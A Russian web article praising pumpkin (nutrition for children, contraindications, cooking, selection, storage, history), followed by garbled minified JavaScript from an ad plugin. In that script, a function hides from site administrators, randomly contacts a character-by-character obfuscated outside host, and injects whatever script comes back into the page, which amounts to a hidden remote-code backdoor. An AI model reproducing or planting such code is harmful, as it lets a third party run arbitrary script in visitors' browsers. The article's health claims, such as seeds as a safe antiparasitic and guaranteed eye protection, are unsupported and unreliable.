Невероятно полезен продукт тыква для детского питания. Мякоть солнечно-оранжевых плодов включают в детский рацион в возрасте ещё до 1 года. Тыква помогает наладить пищеварение и даёт детскому организму массу полезных веществ для роста и развития. Тыквенные семечки являются безопасным средством против паразитов. Включив семечки в свой рацион и детское меню, можно создать надежную профилактику такого неприятного недуга, как энтеробиоз. Также семечки благотворно влияют на пищеварение. Доказанный факт, что, регулярно употребляя тыкву в пищу, можно надёжно защитить зрение и сохранить надолго здоровье глаз.

Стоит подвести итог, говоря о пользе тыквы. Этот продукт благотворно влияет на многие отделы человеческого организма. Но и тыква небезупречна. В каких-то случаях этот плод может нанести и вред.

О вреде тыквы

Рассмотрим, в каких случаях не стоит есть тыкву:

  • острая фаза язвенной болезни желудка и двенадцатиперстной кишки;
  • наличие пищевой аллергии на этот продукт;
  • период расстройства желудка;
  • гипотония;
  • повышенная кислотность;
  • детский возраст до 6 месяцев.

Вот небольшой перечень вариантов, при которых тыкву есть нельзя или можно употреблять в пищу с осторожностью. Также следует знать, что любые хронические заболевания, требующие соблюдения специальной диеты, могут являться противопоказанием для употребления тыквы. Нужна консультация со специалистом!

Как едят тыкву в мире

Вот она какая привлекательная тыква, польза и вред которой не оставляет сомнений в том, что стоит ей заинтересоваться и подумать, а как бы её применить в своем меню. Чтобы сделать это было проще, рассмотрим, как едят этот плод во всём мире.

Из мякоти тыквы готовят огромное количество разных блюд. Особенностью этого продукта является то, что его нельзя отнести к какому-то одному разделу кулинарии. Из тыквы готовят: первые, вторые блюда, кондитерские изделия, напитки, приправы, основы для полуфабрикатов, соусы и многое другое.

Тыкву варят, парят, жарят, пекут. Нередко употребляют тыкву без термической обработки. Сочная мякоть плода имеет насыщенный медово-освежающий вкус, который не требует каких-либо дополнений. Поэтому, если нет противопоказаний, лучше есть тыкву без дополнений и термической обработки. Невероятно хорош на вкус тыквенный сок. Из мякоти делают очень приятное по консистенции и ароматное пюре. Тыкву добавляют в смузи, свежие салаты, миксы.

Как выбрать хорошую тыкву

Чтобы порадовать себя вкусной и сочной мякотью этого плода, стоит уметь его выбирать. Как выбрать хорошую тыкву? Всё очень просто! Спелый и качественный продукт красив на вид, хорошо пахнет. Если надавить на кожуру, она не продавливается, и не остаётся вмятин. Спелая тыква имеет довольно твёрдый верхний слой, который сложно снимается при помощи ножа. Если надрезать кусочек тыквы, выделится сок, прозрачно-оранжевый и немного липкий. Но его не будет много, он ощутим только при прикосновении. Семечки у тыквы белые, твёрдые, гладкие. Хвостик (плодоножка) у спелого плода немного подсохшая, не гнилая. Постукивая по поверхности плода, можно услышать равномерный, слегка глухой звук. Если поднести тыкву к уху и слегка потрясти, не должно быть слышно всплеска, шуршания, перекатывания. Мякоть и семечки в свежем спелом плоде держатся плотно. На поверхности кожуры не должно быть трещин, вмятин, потёртостей, гнилостных «глазков».

Сколько и как хранится тыква

Тыква не относится к скоропортящимся продуктам. Плод можно оставить на зиму и при правильном хранении она пролежит весь сезон. Хранить плоды тыквы нужно в сухом, тёмном, чуть прохладном (до 7 градусов) месте. Для длительного хранения берут цельные плоды.

По сути, тыква — это многогранное, полезное и вкусное растение! Если в вашем холодильнике есть немного тыквы, то вкусный завтрак, обед или ужин вам обеспечен. Из этого плода можно приготовить и праздничное меню. Тыква хороша со всех сторон. Она вкусная, полезная, яркая и аппетитная. А ещё мякоть этого плода очень приятно пахнет. Тыквенный оттенок аромата можно встретить во многих парфюмерных композициях.

Из твёрдой кожуры тыквы делают чудесные сувениры и поделки.

История! Тыква пришла в нашу страну из Европы. А родиной этой культуры по праву считается Мексика. Выращивать целенаправленно эту культуру начали ещё 8000 лет назад. Сегодня можно сказать, что больше всего производят тыкву в России, Китае, Индии. Но и в странах Европы эту растительную культуру ценят, растят и широко применяют.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};